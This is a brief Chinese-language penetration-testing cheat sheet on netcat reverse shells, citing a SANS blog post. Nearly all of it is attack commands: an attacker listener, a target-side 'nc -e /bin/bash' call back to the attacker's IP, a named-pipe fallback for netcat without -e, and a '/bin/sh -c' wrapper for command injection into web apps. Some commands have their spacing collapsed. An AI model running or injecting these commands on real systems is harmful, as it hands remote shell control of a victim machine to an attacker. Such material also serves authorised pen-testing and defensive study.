netcat反弹shell
注意:如果想要在小于1024的端口做监听,那么需要root权限
一)通用场合
1.自己机器:nc—nvlp443
2.目标机:ncattacker'sIP443—e/bin/bash
-n:不解析域名-v:显示连接信息-l:处于监听状态-p:端口号(有时需要单独把-p选项拿出来)
二)如果不支持-e选项:如果代码编译的时候没有指定GAPING_SECURITY_HOLE,那么将不会支持-e选项。
1.nc—nvlp443
2.目标机:
victim$mknod/tmp/backpipep
victim$/bin/sh0</tmp/backpipe|ncpentestbox4431>/tmp/backpipe
通过mknod创建一个命名管道(FIFO)backpipe,p指定管道类型。相应的我们可以使用mkfifo来创建一个命名管道,这样可以省略p选项。大多数shell可以省略0<和1>,但是有些诡异的shell,必须使用0<和1>。
三)如果可以注入命令,但是没有shell(有时这种状况出现在一些webapp),这时需要自己调用/bin/shell,然后使用-c参数来调用命令(另一个shell),然后重定向到netcat。通过如下命令注入。
/bin/sh—c"/bin/sh0</tmp/backpipe|ncpentestbox4431>/tmp/backpipe"
http://pen-testing.sans.org/blog/pen-testing/2013/05/06/netcat-without-e-no-problem